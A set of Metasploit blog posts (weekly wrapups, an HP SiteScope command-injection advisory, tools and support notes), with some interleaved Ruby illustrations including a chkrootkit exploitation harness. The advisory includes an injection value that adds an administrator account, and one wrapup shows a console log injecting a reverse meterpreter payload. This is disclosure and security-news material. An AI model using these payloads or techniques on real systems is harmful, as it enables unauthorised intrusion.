egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Jan 22, 2016

I'm not your mother, clean up after yourself.

 

An old friend of mine, axis2_deployer, is a fun authenticated code execution module that takes advantage of Axis2's ability to deploy new applications on a web server. It used to be a messy friend, leaving its files all over the living room floor for you to clean up manually. As of #6457, you don't have to worry about those files any more because it uses the FileDropper mixin. When you're writing a module that requires putting something on the file system, the polite thing to do is delete it when you're done, and that's exactly what FileDropper is for. Just include the mixin and call register_file_for_cleanup with the remote path, and when a session is created Metasploit will use it to delete your mess.
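To make the shape of that concrete, here is an added illustration of the pattern (written for this page, not the framework's own lib/msf/core/exploit/file_dropper.rb): a stand-in mixin that records paths and removes them from the on_new_session hook, a fake shell session that records the commands it is handed, and a toy module that drops a file and registers it. register_file_for_cleanup, on_new_session, fs.file.rm and shell_command_token are the real framework names; FileDropperDemo, FakeShellSession and DemoExploit are constructed for the demo.

```ruby
# Added illustration of the FileDropper pattern. The mixin below is a
# stand-in, not the framework's file_dropper.rb; the hook on_new_session and
# the session calls fs.file.rm / shell_command_token are the real names,
# everything else is constructed for the demo.
module FileDropperDemo
  # Remember remote paths so they can be removed once a session exists.
  def register_file_for_cleanup(*paths)
    @dropped_files ||= []
    @dropped_files.concat(paths)
  end

  def dropped_files
    (@dropped_files || []).dup
  end

  # Metasploit invokes on_new_session when the payload connects back. That is
  # the first moment the module can act on the target again, so the cleanup
  # happens here. Returns the paths that were removed.
  def on_new_session(session)
    return [] if @dropped_files.nil? || @dropped_files.empty?
    removed = []
    @dropped_files.delete_if do |path|
      ok = if session.type == "meterpreter"
             session.fs.file.rm(path)   # stdapi file removal
             true
           else
             # rm -f prints nothing on success; any output means trouble
             session.shell_command_token("rm -f '#{path}'").to_s.empty?
           end
      removed << path if ok
      ok
    end
    removed
  end
end

# Stand-in for a shell session: records the commands it is asked to run.
class FakeShellSession
  attr_reader :commands

  def initialize
    @commands = []
  end

  def type
    "shell"
  end

  def shell_command_token(cmd)
    @commands << cmd
    ""
  end
end

# Toy module: "uploads" a script and registers it so it is not left behind.
class DemoExploit
  include FileDropperDemo

  def exploit(upload_dir)
    path = File.join(upload_dir, "payload.sh")
    # the upload itself is out of scope for the demo
    register_file_for_cleanup(path)
    path
  end
end

if __FILE__ == $0
  mod = DemoExploit.new
  mod.exploit("/tmp")
  session = FakeShellSession.new
  puts "removed: #{mod.on_new_session(session).inspect}"
  puts "commands sent: #{session.commands.inspect}"
end
```

The point to take away is the timing: nothing is deleted when the module finishes its work, only when a session actually opens, because until then there is no channel back to the target to delete anything with.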

 

Code of Conduct

 

The wider development community has been talking about Codes of Conduct for a while now as a result of a lot of poor behavior. The Metasploit Project has been fortunate not to have had to deal with jerks on the scale that some other projects have, but in order to head those jerks off at the pass, Metasploit now has a Code of Conduct.

Here's an excerpt that explains the motivation:

  We are committed to making participation in this project a harassment-free experience for everyone, regardless of level of experience, gender, gender identity and expression, sexual orientation, disability, personal appearance, body size, race, ethnicity, age, religion, or nationality.

This CoC provides a way for you to contact us and let us know about unacceptable behavior in the community as well as providing guidelines so people know what to expect when such things must be enforced.

  Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.

 

For developers and potential contributors, this means we've got your back. The goal is to give you confidence that if things go wrong, there is already a plan in place and rules that can help. I think it's also important to point out that there was zero dissent in the Pull Request discussion among current committers about whether to adopt this CoC. The building isn't currently on fire, but we as a community, and I personally, want you to be safe putting it out if one comes along.

 

The previous law of the land in the People's Republic of Metasploit was an informal adherence to Wheaton's Law, and that still stands. By adopting a more formal and explicit set of rules, we intend to foster a more welcoming environment where everyone feels comfortable making their first Pull Request.

 

New Modules

Auxiliary and post modules

 

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff is available on GitHub: 4.11.6...4.11.7

 

Happy hacking.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Jan 11, 2016

Aaaaaand we're back! Last week was the first weekly update of the year and it comes with some super fun stuff.

Tunneling

The latest update allows you to tunnel reverse_tcp sessions over a compromised machine in a slightly less painful way. There is now a new datastore option, ReverseListenerComm, which lets you tell a meterpreter session to tunnel connections back to your payload handler. Here's an example run to give you the idea:

 

msf exploit(payload_inject) > show options


Module options (exploit/windows/local/payload_inject):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   NEWPROCESS  true             no        New notepad.exe to inject to
   PID                          no        Process Identifier to inject of process to inject payload.
   SESSION                      yes       The session to run this module on. 

Payload options (windows/meterpreter/reverse_tcp):


   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: , , seh, thread, process, none)
   LHOST     127.0.0.1        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:


   Id  Name
   --  ----
   0   Windows


msf exploit(payload_inject) > set ReverseListenerComm 1
ReverseListenerComm => 1

msf exploit(payload_inject) > set SESSION 1
SESSION => 1
msf exploit(payload_inject) > run 

[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1
[*] Running module against WIN-2DE8F2QP867
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 3092
[*] Sending stage (884270 bytes)
[*] Meterpreter session 2 opened (192.168.5.101-192.168.5.1:4444 -> 127.0.0.1:63173) at 2015-05-20 00:09:44 +0100

meterpreter >

 

The really important line there is this:

[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1

The compromised machine is listening on its localhost for the new connection, but it doesn't have to be localhost; you can tell it to listen on an external address and use psexec against a second internal machine. This used to be possible by creating a route and setting your LHOST to a victim machine's IP address within that route, but it wasn't really clear how to do it and the settings were quite error prone; now it's just a single option to tell Metasploit explicitly where to listen for the payload.

Super fun modules

Joomla

This update comes with a pre-authentication exploit for Joomla, the popular CMS, another in a rich and storied history of deserialization bugs. We've also abstracted some common things into a Joomla mixin, so the next time one of these comes along, writing the exploit will be faster and easier.

Hacking Time


From the module description:

The end goal is to cause ntpd to declare the legitimate peers "false tickers" and choose the attacking clients as the preferred peers, allowing these peers to control time.

Now you, too, can go... NAK to the Future!

 

Exploit modules

 

Auxiliary and post modules

 

 

As always, you can get all these modules and improvements with a simple msfupdate and the full diff is available on GitHub:  4.11.5-2015121501...4.11.5-2016010401

As a result of export restrictions placed on Metasploit Community and Pro trials, this year we have introduced some new systems to help process license requests. We have received a lot of questions about this, and this post will hopefully answer some of them for you. If you haven't read the original blog post about the export controls, please take a moment to review the information there on the updates and who is affected.

 

To help shed light on why some requests from those outside the U.S. or Canada for Metasploit Community or Pro license keys may be denied, below we list some common mistakes we've seen since this process began. To increase the likelihood of your request being quickly approved, be sure to avoid these pitfalls.

 

1) Supply a legitimate physical mailing address

All applications must include a valid physical mailing address, without exception. We frequently receive applications with blank information, gibberish, numbers, or dashes (e.g. -----,----- or 12345, 12345 or ghjghjgh, ghujhgjg).

  • Please only use Latin characters, without accents. Non-Latin characters, including Cyrillic, Arabic, Chinese, and Japanese characters, cannot be validated (e.g. 瑞安中心 6- 8海港路湾仔香港). Also, accents often render incorrectly, so please do not use any accented characters (e.g. 43 Rue Delarivière Lefoullon, Paris).
  • The address must be specific at a street level. Unfortunately geocodes to a neighborhood, city, or county level are not sufficient (e.g. Beijing, Beijing).
  • You must not be located in a U.S.-embargoed country: Cuba, Crimea, North Korea, Iran, Sudan, or Syria.

 

2) Disclose any government affiliations clearly in your application

In addition to address-related issues, we also have seen a number of problems relating to applications from government agencies. Sometimes we'll receive an application from an agency that either is not eligible for an exemption from export restrictions, or did not self-identify as a government agency when applying. In both cases these kinds of applications will be rejected.

 

We realize this application process may seem cumbersome and appreciate your patience as we process your license key request, as each application is manually and individually verified by a legal team. We only ask for information that is required by the U.S. Government export regulations, so please note that omitting or falsifying any information on the application form will most certainly invalidate your application.

 

As always, if you are outside the U.S. or Canada and interested in evaluating Metasploit Pro, don't hesitate to reach out to your Account Executive directly. We appreciate your cooperation as we work to comply with U.S. government regulations.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Dec 17, 2015

Welcome to the last Metasploit update of the year! Since January 1st, 2015, we've had 6364 commits from 176 unique authors, closed 1119 Pull Requests, and added 323 modules. Thank you all for a great year! We couldn't have done it without you.

 

Sounds

 

The sounds plugin has been around for a long time, notifying hackers of new shells via their speakers since 2010. Recently, Wei "sinn3r" Chen gave it a makeover, replacing the old robotic voice with that of Offensive Security founder, Kali Linux core developer, and all-around cool guy Mati "muts" Aharoni. Now when you get a new session, you'll be treated to his sultry voice congratulating you, and when an exploit fails, he'll encourage you to try harder. Just type "load sounds" in msfconsole to hear it in action.

 

New Modules

 

We have eight new modules this week -- 5 exploits and 3 post modules. Among them is an exploit for Jenkins that takes advantage of the java deserialization issue brought to the world's attention by FoxGlove Security a few weeks ago. More exploits for similar vulnerabilities are undoubtedly on the way.

 

Exploit modules

 

Auxiliary and post modules

 

Get it

As always, you can get all these modules and improvements with a simple msfupdate and the full diff is available on GitHub: 4.11.5-2015120901...4.11.5-2015121501

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Dec 11, 2015

Payloads

 

New in the latest Metasploit release are stageless HTTP and HTTPS payloads for Python for those times when you would rather have the whole thing in one file instead of having to stage it. For more on the advantages and quirks of stageless payloads, check out @OJ's post on the subject from when support was first added for Windows.

 

Exploit Modules

 

Does anybody remember that bash(1) bug from a little over a year ago? The one with environment variables getting executed as functions or something? Man, those celebrity bugs, they go off to rehab and everybody forgets about them. Well, Advantech forgot at least, since their EKI Modbus gateways use a vulnerable version of bash to serve CGI scripts. In all seriousness, Shellshock will be with us for a very long time, cropping up in production systems and embedded devices like this for many years to come. Despite the frequent comparison with Heartbleed because of the hype at the time, I personally think it's a much more useful bug. Full shell access is better than memory read access any day of the week.

 

So next time you're doing a pentest and you see something embedded, why not try a little Shellshock?


 

Another fun module for this wrapup is for an old vulnerability, but part of a theme I always enjoy. For some background, chkrootkit(1) is a Linux security tool intended to discover whether a system is compromised via certain artifacts, such as files commonly left around by worms. One of the checks it does is for a file named /tmp/update. Unfortunately, due to some missing quotes, vulnerable versions of chkrootkit won't just check for the existence of that file, but will run it instead. As root. Now, I'd be remiss not to mention that this was patched by all the major distributions in mid-2014 and it's the kind of thing you don't usually find on embedded devices. So in contrast to bash, which is installed by default on just about every kind of device you can think of, you're not going to run into it all that often. It's still a fun bug.
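The "missing quotes" deserve a closer look, because the same mistake is easy to make in any shell script that builds up a list of file names. The harness below is an added example, not chkrootkit's code or the Metasploit module: it reproduces the unquoted assignment from the affected chkrootkit release's slapper() check (0.49 and earlier; 0.50 added the quotes) next to the fixed form, runs each under /bin/sh in a scratch directory standing in for /tmp, and reports whether the planted "update" file was executed. The directory layout, marker file and function name are constructed for the demo.

```ruby
require 'tmpdir'

# The affected chkrootkit release built its result string with an unquoted
# assignment inside the slapper() check:
#     file_port=$file_port $i
# While file_port is still empty the shell reads that line as the command
# "$i" run with file_port= in its environment, so a planted /tmp/update is
# executed with chkrootkit's privileges (root, when run from cron).
VULNERABLE_ASSIGNMENT = 'file_port=$file_port $i'
# Quoting turns the same line back into a plain variable assignment.
FIXED_ASSIGNMENT = 'file_port="$file_port $i"'

# Runs the check loop under /bin/sh in a scratch directory that stands in for
# /tmp, with a planted "update" that creates a marker file when it runs.
# Returns true if the planted file was executed.
def planted_file_executed?(assignment)
  Dir.mktmpdir("chkrootkit-demo") do |dir|
    update = File.join(dir, "update")
    marker = File.join(dir, "marker")
    File.write(update, "#!/bin/sh\n: > '#{marker}'\n")
    File.chmod(0o755, update)
    script = <<~SH
      file_port=
      for i in "#{update}"; do
        if [ -f "$i" ]; then
          #{assignment}
        fi
      done
      exit 0
    SH
    system("/bin/sh", "-c", script, out: File::NULL, err: File::NULL)
    File.exist?(marker)
  end
end

if __FILE__ == $0
  puts "unquoted: planted file executed = #{planted_file_executed?(VULNERABLE_ASSIGNMENT)}"
  puts "quoted:   planted file executed = #{planted_file_executed?(FIXED_ASSIGNMENT)}"
end
```

The general lesson is that `VAR=value command` is valid shell, so an assignment whose right-hand side expands to more than one word silently becomes a command invocation; quote every assignment that concatenates untrusted names.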

 

Performance Improvements

 

Thanks to the work of community contributors Jon Cave and Meatballs, meterpreter file downloads and uploads have improved considerably. While there is still some room for improvement in this area, it's now possible to upload and download files in the tens of megabytes range in a reasonable amount of time across all the meterpreter implementations. Interestingly, Python meterpreter was the fastest in my testing, pulling down a 32MB file in 19 seconds, or roughly 13.47Mb/s.

 

Exploit modules

 

Auxiliary and post modules

 

Get It

 

As always, all the changes since the last wrapup can be had with a simple msfupdate and the full diff is available on github: 4.11.5-2015111801...4.11.5-2015120901

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Nov 20, 2015

Python extension for Windows Meterpreter

 

Meterpreter offers some pretty powerful post-exploitation capabilities, from filesystem manipulation to direct Windows API calls with railgun, and everything in between.

 

One thing that's been missing for a long time is on-victim scripting. With this update comes an experimental Python extension to remedy that. It's still in its infancy, so expect some kinks to be worked out over the next few weeks, but it is functional. OJ's excellent Pull Request offers some insights into how it works and where it's going.

 

New Modules

 

This update also includes a few PHP code execution exploits, including one for the very popular vBulletin, a cheeky one for a cute backdoor used by Chinese attackers according to the great analysis by FireEye, and one for Up.Time.

 

Up.Time, the tale of a bad patch

 

In late 2013, we published an exploit module by Denis Andzakovic targeting Up.Time, an IT infrastructure monitoring tool. As part of the initial advisory, the researcher quoted the vendor saying

As a policy to protect our customers, we do not discuss any vulnerabilities with outside companies.

Which apparently includes the person reporting the vulnerability.

 

And indeed, there doesn't seem to be any public discussion of this vuln (or any others for that matter) from the vendor, not even a mention of when a patch was available. It turns out that, whenever that patch came out, it didn't actually fix the vulnerability and thanks to contributors Ewerson Guimaraes and Gjoko Krstic, we now have an exploit that targets the latest Up.Time versions 7.4 and 7.5.

 

Exploit modules

 

Auxiliary and post modules

 

 

Get it

 

As always, all the changes since the last wrapup can be had with a simple msfupdate and the full diff is available on github: 4.11.5-2015110801...4.11.5-2015111801

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Nov 6, 2015

One of the greatest things about Metasploit is that it supports lots of different protocols and technologies that you would otherwise need a huge menagerie of tools to be able to talk to, an ever-expanding bubble of interoperability that you didn't have to write. Due to some great ongoing work by Bigendian Smalls, the bubble is getting even bigger, now encompassing shell sessions on mainframes. You can see the beginnings in #6013 and #6067.

 

New Modules

This update also comes with a fun privilege escalation exploit for OSX where an environment variable ends up on a commandline. I love these kinds of bugs because people have been screwing up environment variables since the invention of shells.

 

As always, you can see all the changes since the last wrapup on github: 4.11.4-2015102801...4.11.5-2015103001

 

Exploit modules

 

Auxiliary and post modules

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Oct 29, 2015

This week's update brings a fun user-assisted code execution bug in Safari. It works by opening up an "applescript://" URL, which pops an AppleScript editor, and then getting the user to hit Command-R (normally the keybinding for reloading the page). The key combo will pass down to the editor and run the script.

 

There is a mitigating factor here in the form of Gatekeeper, part of Apple's "walled garden" architecture, designed to protect users from people who haven't given Apple $99. In its default setting on Mountain Lion and newer, Gatekeeper will pop up a couple of "Are you sure?"s before letting the user give you a shell. But hey, signed Java applets are still moderately effective at getting shells in phishing campaigns in spite of click-to-play, so chances are still pretty good.

 

You can see all the changes since the last wrapup on github: 4.11.4-2015101401...4.11.4-2015102801

 

Exploit modules

 

Auxiliary and post modules

In August, we were getting a lot of questions about Kali 2. I answered some of them in the Metasploit on Kali Linux 2.0 blog post. Today, I am pleased to announce that we are extending our official platform support to three new operating systems, which are now listed on the Metasploit System Requirements page:

  • Kali Linux 2.0
  • Red Hat Enterprise Server 7.1 or later
  • Microsoft Windows Server 2012 R2

 

Since we have added Kali 2 as a supported operating system, we no longer support Kali 1.x. Please note that these changes apply to our closed source products, which are Metasploit Community, Express, and Pro. Since Metasploit Framework is a free and open source tool, we do not provide support for it.

 

Let me now try to cover some frequently asked questions:

 

What is the difference between Rapid7 officially supported and not supported platforms?

For every platform we list on our Metasploit System Requirements page, we perform automated testing before every release. Additionally, we perform full regression tests whenever we introduce a new feature. This minimizes the chance of introducing a defect. Besides testing, we have a lab environment that includes each of the supported platforms, so that when customers report issues we can quickly reproduce and address them. For these reasons, we highly recommend that you use a supported platform.

 

Kali 2 already comes with Metasploit Framework, how does this change affect me?

This announcement only applies to our closed source products, which are Metasploit Community, Express, and Pro. Since Framework is an open source tool, we do not provide support for Metasploit Framework; however, you may still receive community support via the IRC channel and Rapid7 Community Discussions.

 

Additionally, we have recently released Metasploit Framework Open Source Installers. If you wish to always stay on the latest version of Metasploit Framework, feel free to use the open source installers.

 

Kali 2 already comes with Metasploit Framework, can I still install Community, Express or Pro editions?

Yes, Kali 2 comes with a version of Metasploit Framework, but you can still install any of our closed source editions of Metasploit without any issues. As I mentioned above, Express and Pro editions are now fully supported on Kali 2. Once you install the Community, Express, or Pro edition, you will see that the package installs into a completely different path, so it will not overwrite the Kali-provided Framework. You will also be able to use the command line provided with the Pro edition without issues.

 

Can I continue to use Kali 1.1?

If you wish to continue using Kali 1.1, you certainly can. Please keep in mind that it is no longer supported and we do not perform tests on this platform anymore. Thus it is highly possible that some things may not work as expected.

 

I have further questions, what do I do?

Feel free to leave a comment on this thread, or send us a tweet.

 

Eray Yilmaz - @erayymz

Sr. Product Manager

Welcome to this week's Metasploit Wrapup. I'm your host Brent Cook, tagging in for egypt who just finished speaking about Metasploit at the Texas DIR Telecommunications Forum. This week was largely focused on bug fixes and refinements.

 

In the fixes bucket, PowerShell sessions now properly upgrade with the 'sessions -u' command. Fixing this also revealed some general problems handling PowerShell commands, which were also fixed. SRVHOST, like LHOST, now supports tab completion, which is super useful compared to having to remember what your local IP addresses are. Modules using SSL can now set advanced options, including support for TLS 1.2, and a similar fix was applied to the SMB and TCP login scanner modules. We also fixed a bug preventing 64-bit Linux staged command payloads from running, which unlocks loading some more interesting 64-bit Linux payloads in the future.

 

As modules get used in more varied scenarios and environments, deficiencies in modules are often uncovered. As a result of your reports, MS SQL, IMAP and POP3 protocol handlers now handle network failures better. The Java RMI scanner is also more resilient when handling larger protocol responses. Even the venerable msfd now has a 'quiet' option, that makes it work nicely with dumb network clients.

 

Of course, there were a few new modules this week as well, including:

 

This is a vulnerability advisory for the HP SiteScope DNS Tool Command Injection vulnerability, made in accordance with Rapid7's disclosure policy.

 

Summary

 

Due to a problem with sanitizing user input, authenticated users of HP SiteScope running on Windows can execute arbitrary commands on affected platforms as the local SYSTEM account. While it is possible to set a password for the SiteScope application administrator, this is not enforced upon installation. Therefore, in default deployments, any user who can navigate to the SiteScope service may execute arbitrary commands on the underlying operating system. If a password is set, only authenticated users may do so, which is still an unexpected level of operating system access.

 

Product Description

 

HP SiteScope is an agentless application monitoring solution, provided by Hewlett Packard to enterprise customers.

 

Credit

 

This issue was first discovered and reported by Kirk Hayes of Rapid7, Inc. and Charles Riggs of Knowledge Consulting Group.

 

Exploitation

 

Navigating to http://<server>:8080/SiteScope/servlet/Main will typically present any user with a control panel UI with the permissions of "SiteScope Administrator," as seen in the screenshot below.

 

 

Once logged in, an attacker may navigate to the DNS Tool, found under Tools > Network Tools > DNS Tool, and enter any domain name for resolution in the Host name to resolve field, and append any other valid operating system command with the usual techniques. For example, attempting to resolve `google.com & net user HPpoc QWERty1234 /ADD & net localgroup administrators HPpoc /ADD` results in successfully creating a user and adding the user to the local administrators group, as seen in the screenshot below:

 

 

An attacker may similarly append any operating system command in the DNS Server field as well.
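For developers who want to understand the bug class rather than the particular product, here is an added illustration (written for this page in Ruby; SiteScope itself is a Java application and this is not its code) of the vulnerable shape beside a hardened one. It assumes the tool wraps nslookup, which is a guess about the implementation, and the function names are my own. The vulnerable form pastes the user's "host name to resolve" into one shell string, so an `&` (cmd.exe) or `;` (sh) ends the nslookup command and starts another; the hardened form validates the input against the hostname grammar and hands each value to the process as its own argv element so no shell parses it.

```ruby
# Added illustration of OS command injection in a DNS lookup tool; not
# SiteScope's code. nslookup is an assumed resolver.

# Vulnerable shape: one shell string. "&" on Windows (cmd.exe) or ";" / "|"
# on Unix ends the intended command and starts the attacker's.
def vulnerable_dns_command(host, server = nil)
  "nslookup #{host}#{server ? " #{server}" : ""}"
end

# RFC 1123 hostname label: alphanumerics and hyphens, no leading or trailing
# hyphen, 1 to 63 characters. Dotted IPv4 addresses pass this too.
LABEL = /\A[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\z/i

def valid_hostname?(name)
  return false if name.nil? || name.empty? || name.length > 253
  labels = name.chomp(".").split(".", -1)
  !labels.empty? && labels.all? { |l| l.match?(LABEL) }
end

# Hardened shape: validate, then build argv so the values are never parsed by
# a shell. Raises on anything that is not a hostname or address.
def safe_dns_argv(host, server = nil)
  [host, server].compact.each do |value|
    raise ArgumentError, "refusing to resolve #{value.inspect}" unless valid_hostname?(value)
  end
  ["nslookup", host, *[server].compact]
end

# Kernel#system with separate arguments execs the binary directly; no shell.
def safe_dns_lookup(host, server = nil)
  system(*safe_dns_argv(host, server))
end

if __FILE__ == $0
  input = ARGV.fetch(0, "google.com & net user HPpoc QWERty1234 /ADD")
  puts "vulnerable would run: #{vulnerable_dns_command(input)}"
  begin
    puts "hardened would exec:  #{safe_dns_argv(input).inspect}"
  rescue ArgumentError => e
    puts "hardened rejected it: #{e.message}"
  end
end
```

Validation alone is not the fix; argv-style execution is what removes the shell from the path, and the whitelist is there so that a name which is syntactically a hostname cannot still smuggle option flags to the resolver.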

 

A Metasploit module has been published that demonstrates the issue.

 

Mitigations

 

To mitigate this issue, users should grant access to the SiteScope web application only to users who are trusted with local SYSTEM access on the machine SiteScope is installed on. Of course, users are also strongly encouraged to set a strong password for all SiteScope users.

 

Alternatively, users should host SiteScope on Linux platforms, and configure SiteScope to run as a non-root user. This advice appears to be the preferred mitigation from the vendor per discussions between the vendor and Rapid7. On Windows, SiteScope appears to require local SYSTEM access in order to perform intended functionality, so account permissions for the application or individual users would not appear to be effective on this operating system.

 

Disclosure Timeline

 

In accordance with Rapid7's disclosure policy, the vendor was made aware of this issue at least 60 days prior to this advisory's publication.

 

  • Mon, Jun 01, 2015: Initial Discovery by Kirk Hayes and Charles Riggs
  • Tue, Jun 02, 2015: Validated current version's vulnerability (v11.30)
  • Thu, Jun 04, 2015: Offered to HP TippingPoint's ZDI program
  • Tue, Jun 30, 2015: Rejected by ZDI
  • Wed, Jul 01, 2015: Details disclosed to vendor, case # SSRT103139 assigned
  • Wed, Aug 19, 2015: Issue receipt acknowledged by vendor, mitigation suggested
  • Tue, Aug 25, 2015: Details disclosed to CERT
  • Mon, Aug 31, 2015: CERT assigned VU#626368
  • Fri, Oct 9, 2015: Public disclosure and Metasploit module published.

There are a wide variety of interesting and useful tools in the Metasploit Framework. Many of these are available from the top-level of Metasploit in the form of modules and library code. You can find countless tutorials and blogs about how to put msfconsole, msfvenom and other top-level commands to good use. However, not many people know about the 'tools' directory, which contains many useful, single-purpose scripts, with topics spanning from exploit development to statistics.

 

One of the problems with the tools directory is that it was not very well organized. Like a messy toolbox, it had grown organically over the years, making it difficult to find things. To correct this, we have reorganized the tools directory by category, making tools easier to discover and encouraging their use. The new categories are:

 

  • dev: tools for managing developer tasks
  • exploit: tools for developing exploits
  • modules: tools for gathering project statistics, checking code quality, and checking payloads
  • password: tools for extracting and cracking passwords
  • recon: tools for collecting target data

 

In the process, we found a few tools that may have outlived their usefulness. While we have not deleted anything yet, we may remove some obscure or unused tools in the future. Until then, please take a moment to check out the new cleaned-up tools directory and find something new! While you're there, be sure to check out our latest tool addition, MSU Finder.

Patch testing and analysis are important parts of vulnerability research and exploit development. One popular reason is to rediscover patched bugs, or to find ways to keep an 0day alive in case the fix in place is inadequate. The same process is also used to find the range of builds affected by a vulnerability, which helps predict the value of the exploit and improve target coverage and reliability.

 

Going through Microsoft patches is no easy task, though. There could be hundreds of patches for the advisory you're working on, each for a different operating system, architecture, language, etc. Of course, there are tools publicly available that can search for and apply whatever patches you're missing, but those are only great for regular use such as home or IT infrastructure. For research purposes, we usually don't want just one patch. We often want all (or most) that are associated with the product. Surprisingly, there seem to be no tools suitable for this kind of task. So we made a new tool called MSU Finder, and another called extract_msu.bat to extract patches.

 

MSU Finder

 

The main purpose of MSU Finder is to find the download links for Microsoft patches. You can also use it to find advisories of a given product, in case you are curious about how often something gets updated.

 

Technet Search Engine

 

The tool supports two ways to find Microsoft advisories. The first and default one is via Technet. In this mode, MSU Finder will check against a pre-defined product list from Technet, and return all the ones that match. If nothing matches, the tool will just perform a more generic search. The Technet search engine allows you to search by MSB, KB, or CVE number.

 

Google Custom Search API

 

The other search engine MSU Finder supports is Google Custom Search API. The request is equivalent to the following Google search:

 

SEARCH_QUERY site:technet.microsoft.com intitle:"Microsoft Security Bulletin" -"Microsoft Security Bulletin Summary"

 

To be able to use the Google engine, you need to get an API key and a Search Engine ID:

 

  1. Have a Gmail account
  2. Go to Google Developer's Console
    1. Enable Custom Search API
    2. Create a credential. This credential is the API key.
  3. Go to Custom Search
    1. Create a new search engine
    2. Under Sites to Search, set it to: technet.microsoft.com
    3. In your search site, get the Search Engine ID under the Basics tab.

 

Usage

 

MSU Finder currently has a bit of a learning curve. First off, the -q argument is mandatory. An important thing to understand is that the script will find advisories associated with that string, and then give you ALL the download links. And by "ALL", I mean all of them. For example, if your -q is "Internet Explorer 11", you will also get download links for other IE versions because they are all associated with the same advisory (vulnerability). So to narrow down your results, you will need the -r option as well.

 

For example, if you want to look for IE 11 patches for x86, use a more narrow query like this:

 

$ ruby tools/exploit/msu_finder.rb -q "Internet Explorer 11" -r "^IE11.+x86"

 

The -r option is a regular expression (regex) filter for the download link. This method works well if you are already familiar with Microsoft's patch naming convention, which typically begins with the product name or the operating system. You may need to play with this a little bit to get the hang of it. Even if you can't find an appropriate regex, it's okay. Download them anyway, and then on Windows you can sort files by modified date or product version, and then it will become apparent which ones you want, or don't want.
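To show what the -r filter is doing, and what the Google engine mode described above boils down to, here is an added example written for this page (not msu_finder.rb itself). It assumes the regex is matched against the file name at the end of each link rather than the whole URL, which is the only way the `^IE11.+x86` example above can match anything; the sample links, the KB number and the helper names are constructed for the demo. The Custom Search request uses the public Custom Search JSON API endpoint with the site and intitle restrictions quoted earlier.

```ruby
require 'uri'

# Constructed sample of the links one advisory page might carry: the same KB
# shipped for two IE versions and two operating systems in two architectures.
# The KB number is made up.
SAMPLE_LINKS = %w[
  https://download.microsoft.com/download/x/IE11-Windows6.1-KB1234567-x86.msu
  https://download.microsoft.com/download/x/IE11-Windows6.1-KB1234567-x64.msu
  https://download.microsoft.com/download/x/IE10-Windows6.1-KB1234567-x86.msu
  https://download.microsoft.com/download/x/Windows8.1-KB1234567-x86.msu
  https://download.microsoft.com/download/x/Windows8.1-KB1234567-x64.msu
].freeze

# Applies a -r style filter. The regex is matched against the file name at the
# end of the link rather than the whole URL (an assumption about msu_finder);
# that is what lets an anchored pattern such as "^IE11.+x86" match at all.
def filter_links(links, regex)
  re = Regexp.new(regex)
  links.select { |link| File.basename(URI(link).path) =~ re }
end

# Pulls product, KB and architecture out of the usual
# <product>-KB<number>-<arch>.msu name, for sorting once downloaded.
# Returns nil for names that do not follow the convention.
def patch_fields(link)
  name = File.basename(URI(link).path, ".msu")
  m = name.match(/\A(?<product>.+)-KB(?<kb>\d+)-(?<arch>x86|x64|ia64|arm)\z/i)
  m && { product: m[:product], kb: m[:kb], arch: m[:arch].downcase }
end

# Builds the Google Custom Search JSON API request that the Google engine
# mode corresponds to, with the site/intitle restriction from the post.
def custom_search_url(api_key, cx, query)
  q = %(#{query} site:technet.microsoft.com intitle:"Microsoft Security Bulletin" -"Microsoft Security Bulletin Summary")
  "https://www.googleapis.com/customsearch/v1?" +
    URI.encode_www_form(key: api_key, cx: cx, q: q)
end

if __FILE__ == $0
  filter_links(SAMPLE_LINKS, ARGV.fetch(0, "^IE11.+x86")).each do |link|
    puts "#{File.basename(link)}  #{patch_fields(link).inspect}"
  end
end
```

Running it with no argument applies the `^IE11.+x86` pattern from the post and keeps a single link out of the five; `x64` keeps two. The patch_fields output is the kind of structure you would sort on instead of eyeballing modified dates once the files are on disk.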

 

If you are not sure which advisories might get picked up by the search, try the -d option. This will only show you advisory numbers without actually fetching any links:

 

$ ruby tools/exploit/msu_finder.rb -q "Internet Explorer (10|11)" -d

 

Finally, MSU Finder does not include the ability to download patches directly, but you can save the links to a file and use a tool like wget to download them:

 

$ ruby tools/exploit/msu_finder.rb -q "ms15-100" -r x86 > /tmp/list.txt && wget -i /tmp/list.txt

 

To learn more about MSU Finder, please use the -h flag.

 

extract_msu.bat

 

As the name implies, this tool can extract Microsoft patches, specifically MSU files. It only runs on Windows, because it basically uses the expand command to extract. To use this:

 

  1. Start a Windows machine (XP or higher, so you have the `expand` command available)
  2. Copy extract_msu.bat onto the Windows machine
  3. Put all the MSU files in the same directory
  4. Run: extract_msu.bat [absolute path to the directory]
  5. As the tool runs, it will create a new folder for each MSU. And then in that new folder, there's another sub-folder named "extracted", that's where you can find the actual file(s) the patch wants to install. Now, since you're on Windows, you can search whatever DLL (or EXE) you are looking for, and then easily sort by creation date, product version, etc. Or, you can copy and paste all the found files onto the same folder, and then use whatever 3rd-party tool for additional analysis.


Both of these tools are now available in the Metasploit Framework. You can use MSU Finder to find advisories, or leverage it to automatically download patches. After downloading, you can use extract_msu.bat to extract them. Once the patches are extracted, you can easily search for the actual components you want, put them in one place, and you have a nice collection of release builds for research or development purposes.

To get your hands on these tools, feel free to download the Metasploit Framework or git clone the repository. If you are already a Metasploit user, you can run msfupdate to receive them. To report a bug or request additional features, please submit an issue to our metasploit-framework repository on GitHub.

egypt

Weekly Metasploit Wrapup

